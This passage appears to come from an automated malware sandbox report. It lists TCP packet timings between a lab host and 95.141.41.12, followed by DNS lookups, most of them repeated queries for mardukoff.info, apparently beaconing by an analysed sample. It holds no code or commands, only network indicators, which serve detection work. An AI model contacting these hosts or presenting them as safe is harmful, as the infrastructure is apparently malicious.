                                                                                              Sep 28, 2023 06:05:07.354394913 CEST805034895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:07.354655027 CEST5034880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.549310923 CEST805034995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:07.556077957 CEST805034995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:07.556374073 CEST5034980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.639066935 CEST5034980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.639390945 CEST5035080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.829901934 CEST805035095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:07.830108881 CEST5035080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.830233097 CEST5035080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:07.836430073 CEST805034995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:07.836502075 CEST5034980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.020445108 CEST805035095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:08.025269985 CEST805035095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:08.025576115 CEST5035080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.107280970 CEST5035080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.107589006 CEST5035280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.297703028 CEST805035095.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:08.297919989 CEST5035080192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.302018881 CEST805035295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:08.302301884 CEST5035280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.302382946 CEST5035280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.497183084 CEST805035295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:08.502104998 CEST805035295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:08.502394915 CEST5035280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.591459036 CEST5035280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.591722012 CEST5035380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.786370039 CEST805035295.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:08.786689043 CEST5035280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.793385029 CEST805035395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:08.793567896 CEST5035380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.793756008 CEST5035380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:08.995229959 CEST805035395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:09.000294924 CEST805035395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:09.000530005 CEST5035380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.091686010 CEST5035380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.092223883 CEST5035480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.278995991 CEST805035495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:09.279381037 CEST5035480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.279381990 CEST5035480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.293026924 CEST805035395.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:09.293303967 CEST5035380192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.466278076 CEST805035495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:09.471210003 CEST805035495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:09.471549988 CEST5035480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.560283899 CEST5035480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.560513020 CEST5035580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.747725010 CEST805035495.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:09.748023033 CEST5035480192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.754426956 CEST805035595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:09.754538059 CEST5035580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.754693031 CEST5035580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:09.948396921 CEST805035595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:09.953906059 CEST805035595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:09.954205036 CEST5035580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.044509888 CEST5035580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.044933081 CEST5035780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.232302904 CEST805035795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:10.232690096 CEST5035780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.232729912 CEST5035780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.238558054 CEST805035595.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:10.238895893 CEST5035580192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.420012951 CEST805035795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:10.425874949 CEST805035795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:10.425987959 CEST5035780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.513591051 CEST5035780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.514036894 CEST5035880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.702049971 CEST805035795.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:10.702279091 CEST5035780192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.710922956 CEST805035895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:10.711236954 CEST5035880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.711322069 CEST5035880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.908210993 CEST805035895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:10.912713051 CEST805035895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:10.912796021 CEST5035880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.997669935 CEST5035880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:10.997905970 CEST5035980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.192121029 CEST805035995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:11.192349911 CEST5035980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.192435980 CEST5035980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.194894075 CEST805035895.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:11.195086002 CEST5035880192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.386634111 CEST805035995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:11.391191959 CEST805035995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:11.391268969 CEST5035980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.481981993 CEST5035980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.482399940 CEST5036180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.673311949 CEST805036195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:11.673422098 CEST5036180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.673583031 CEST5036180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.676054001 CEST805035995.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:11.676229954 CEST5035980192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.864239931 CEST805036195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:11.866707087 CEST805036195.141.41.12192.168.2.3
                                                                                              Sep 28, 2023 06:05:11.866900921 CEST5036180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.950654030 CEST5036180192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:11.950997114 CEST5036280192.168.2.395.141.41.12
                                                                                              Sep 28, 2023 06:05:12.141524076 CEST805036195.141.41.12192.168.2.3
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Sep 28, 2023 06:01:51.913273096 CEST192.168.2.38.8.8.80x6e27Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:01:52.322094917 CEST192.168.2.38.8.8.80x46abStandard query (0)transdi.orgA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:01:54.298491955 CEST192.168.2.38.8.8.80xe929Standard query (0)pixcode.com.mxA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:01:56.128799915 CEST192.168.2.38.8.8.80xca3bStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:01:56.829381943 CEST192.168.2.38.8.8.80x1f55Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:01:57.362481117 CEST192.168.2.38.8.8.80x994bStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:00.661344051 CEST192.168.2.38.8.8.80x6dd5Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:04.414673090 CEST192.168.2.38.8.8.80x3651Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:05.418850899 CEST192.168.2.38.8.8.80x3651Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:08.323580027 CEST192.168.2.38.8.8.80x8bfbStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:10.932049036 CEST192.168.2.38.8.8.80x3694Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:14.680577993 CEST192.168.2.38.8.8.80x3528Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:15.684405088 CEST192.168.2.38.8.8.80x3528Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:18.291830063 CEST192.168.2.38.8.8.80xfcafStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:20.910119057 CEST192.168.2.38.8.8.80x7ac0Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:24.661358118 CEST192.168.2.38.8.8.80xe04aStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:28.413966894 CEST192.168.2.38.8.8.80x4b09Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:31.021256924 CEST192.168.2.38.8.8.80xb189Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:33.657877922 CEST192.168.2.38.8.8.80x6c84Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:36.281214952 CEST192.168.2.38.8.8.80xe732Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:38.904067993 CEST192.168.2.38.8.8.80x47caStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:41.676569939 CEST192.168.2.38.8.8.80x18a7Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:44.302740097 CEST192.168.2.38.8.8.80x28d8Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:46.946325064 CEST192.168.2.38.8.8.80xb5acStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:49.576992989 CEST192.168.2.38.8.8.80x2e35Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:52.208522081 CEST192.168.2.38.8.8.80xf82bStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:54.835913897 CEST192.168.2.38.8.8.80x3285Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:57.505244970 CEST192.168.2.38.8.8.80xa25dStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:02:58.992515087 CEST192.168.2.38.8.8.80x6f37Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:00.475613117 CEST192.168.2.38.8.8.80x195bStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:02.014281034 CEST192.168.2.38.8.8.80xff6Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:03.516491890 CEST192.168.2.38.8.8.80xc405Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:05.005858898 CEST192.168.2.38.8.8.80x5a02Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:06.473185062 CEST192.168.2.38.8.8.80x2970Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:07.959367990 CEST192.168.2.38.8.8.80xf89Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:08.965435982 CEST192.168.2.38.8.8.80xf89Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:09.981151104 CEST192.168.2.38.8.8.80xf89Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:11.476001024 CEST192.168.2.38.8.8.80x4c23Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:12.959315062 CEST192.168.2.38.8.8.80x283eStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:14.429656029 CEST192.168.2.38.8.8.80xc869Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:16.021245956 CEST192.168.2.38.8.8.80xe632Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:17.521954060 CEST192.168.2.38.8.8.80x14e9Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:19.154333115 CEST192.168.2.38.8.8.80xbc07Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:20.708077908 CEST192.168.2.38.8.8.80xa0e4Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:22.255918026 CEST192.168.2.38.8.8.80x55acStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:23.755639076 CEST192.168.2.38.8.8.80xd80eStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:25.317950964 CEST192.168.2.38.8.8.80xb566Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:26.816870928 CEST192.168.2.38.8.8.80xbdd2Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:28.459275007 CEST192.168.2.38.8.8.80x8e36Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:29.958141088 CEST192.168.2.38.8.8.80xeca0Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:31.520169973 CEST192.168.2.38.8.8.80xbdb4Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:33.145133018 CEST192.168.2.38.8.8.80x5060Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:34.816813946 CEST192.168.2.38.8.8.80xca41Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:36.317078114 CEST192.168.2.38.8.8.80xad8cStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:37.968913078 CEST192.168.2.38.8.8.80xeb06Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:39.614444017 CEST192.168.2.38.8.8.80x33d2Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:41.145749092 CEST192.168.2.38.8.8.80x3797Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:42.755068064 CEST192.168.2.38.8.8.80x7ac3Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:44.457655907 CEST192.168.2.38.8.8.80x8c28Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:45.959677935 CEST192.168.2.38.8.8.80xa8abStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:47.520441055 CEST192.168.2.38.8.8.80x5507Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:49.145426035 CEST192.168.2.38.8.8.80x9770Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:50.707705021 CEST192.168.2.38.8.8.80x4b70Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:52.254549026 CEST192.168.2.38.8.8.80xe8d1Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:53.756706953 CEST192.168.2.38.8.8.80xc646Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:55.316945076 CEST192.168.2.38.8.8.80x95c6Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:56.957318068 CEST192.168.2.38.8.8.80x814eStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:03:58.542382956 CEST192.168.2.38.8.8.80xd1ecStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:00.206012011 CEST192.168.2.38.8.8.80xbadeStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:00.675966978 CEST192.168.2.38.8.8.80xf42aStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:02.204997063 CEST192.168.2.38.8.8.80xe795Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:03.215066910 CEST192.168.2.38.8.8.80xe795Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:04.757143021 CEST192.168.2.38.8.8.80x38c1Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:06.251590967 CEST192.168.2.38.8.8.80xeca4Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:07.814090967 CEST192.168.2.38.8.8.80x6d9eStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:09.455094099 CEST192.168.2.38.8.8.80x60c4Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:10.956208944 CEST192.168.2.38.8.8.80xe8a7Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:12.455519915 CEST192.168.2.38.8.8.80xd100Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:14.021735907 CEST192.168.2.38.8.8.80xea24Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:15.826355934 CEST192.168.2.38.8.8.80xa2ceStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:17.314559937 CEST192.168.2.38.8.8.80xb152Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:18.814215899 CEST192.168.2.38.8.8.80xe4Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:20.455151081 CEST192.168.2.38.8.8.80xb6b4Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:22.018085957 CEST192.168.2.38.8.8.80x4056Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:23.644385099 CEST192.168.2.38.8.8.80x1642Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:25.143450022 CEST192.168.2.38.8.8.80xeb72Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:26.714020967 CEST192.168.2.38.8.8.80x9741Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:28.205857992 CEST192.168.2.38.8.8.80x9c89Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:29.752717972 CEST192.168.2.38.8.8.80xbb27Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:31.268170118 CEST192.168.2.38.8.8.80xd89aStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:32.814217091 CEST192.168.2.38.8.8.80xe57bStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:34.455697060 CEST192.168.2.38.8.8.80x9559Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:36.018604040 CEST192.168.2.38.8.8.80xd816Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:37.517965078 CEST192.168.2.38.8.8.80xdc8dStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:39.146733046 CEST192.168.2.38.8.8.80x22Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:40.706398964 CEST192.168.2.38.8.8.80x891bStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:42.254261017 CEST192.168.2.38.8.8.80x2a91Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:43.752412081 CEST192.168.2.38.8.8.80xad56Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:45.518384933 CEST192.168.2.38.8.8.80x6a6dStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:47.018479109 CEST192.168.2.38.8.8.80x7526Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:47.486953974 CEST192.168.2.38.8.8.80x9217Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:49.017967939 CEST192.168.2.38.8.8.80x79c4Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:50.642728090 CEST192.168.2.38.8.8.80x787fStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:52.205854893 CEST192.168.2.38.8.8.80xf51Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:53.752157927 CEST192.168.2.38.8.8.80x480cStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:55.251744986 CEST192.168.2.38.8.8.80xb5dfStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:56.823581934 CEST192.168.2.38.8.8.80x2f16Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:58.455416918 CEST192.168.2.38.8.8.80x87e4Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:04:59.955661058 CEST192.168.2.38.8.8.80xfde1Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:01.456950903 CEST192.168.2.38.8.8.80x4c43Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:03.017791033 CEST192.168.2.38.8.8.80x4ca1Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:04.642312050 CEST192.168.2.38.8.8.80xcb73Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:06.205029011 CEST192.168.2.38.8.8.80x67e3Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:07.704914093 CEST192.168.2.38.8.8.80xa668Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:09.251626968 CEST192.168.2.38.8.8.80xe66bStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:10.751912117 CEST192.168.2.38.8.8.80x6827Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:12.252154112 CEST192.168.2.38.8.8.80x9d40Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:13.814271927 CEST192.168.2.38.8.8.80xdf91Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:15.314929008 CEST192.168.2.38.8.8.80x4928Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:16.954664946 CEST192.168.2.38.8.8.80x537dStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:18.518348932 CEST192.168.2.38.8.8.80xbf6aStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:20.142421961 CEST192.168.2.38.8.8.80x8d47Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:21.704576015 CEST192.168.2.38.8.8.80xcb1eStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:23.454513073 CEST192.168.2.38.8.8.80x1a92Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:24.955686092 CEST192.168.2.38.8.8.80x8dc2Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:26.525408983 CEST192.168.2.38.8.8.80xd8cfStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:28.018086910 CEST192.168.2.38.8.8.80xeaStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:29.642808914 CEST192.168.2.38.8.8.80xe658Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:31.143083096 CEST192.168.2.38.8.8.80x929Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:32.704852104 CEST192.168.2.38.8.8.80x7a83Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:34.407767057 CEST192.168.2.38.8.8.80x45eStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:36.017805099 CEST192.168.2.38.8.8.80x3593Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:37.646495104 CEST192.168.2.38.8.8.80x7315Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:39.204844952 CEST192.168.2.38.8.8.80x1b5dStandard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:40.753181934 CEST192.168.2.38.8.8.80xcfb1Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
                                                                                              Sep 28, 2023 06:05:42.251802921 CEST192.168.2.38.8.8.80xbca7Standard query (0)mardukoff.infoA (IP address)IN (0x0001)false
